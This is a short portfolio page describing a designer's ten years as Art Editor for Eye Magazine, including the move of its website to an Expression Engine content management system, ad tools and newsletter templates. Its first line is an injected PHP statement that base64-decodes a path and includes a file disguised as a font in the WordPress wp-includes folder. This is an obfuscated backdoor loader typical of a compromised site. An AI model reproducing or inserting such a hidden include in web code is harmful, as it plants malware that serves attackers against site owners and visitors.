@include base64_decode("L2hvbWUvamF5Z2xvdy9qYXlnbG93LmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); Eye website – jayglow

Eye website

Eye Website


Alongside being the Art Editor for Eye Magazine for ten years, I also oversaw all digital output for the magazine. This included migrating the existing outdated database into a new Expression Engine based content management system, developed by Madebycloud. The site also incorporates an advertising platform which I showed the existing ad team how to use. I also created social media content, banner ads and Mailchimp newsletter templates.

This is a unique website which will require a more modern browser to work!

Please upgrade today!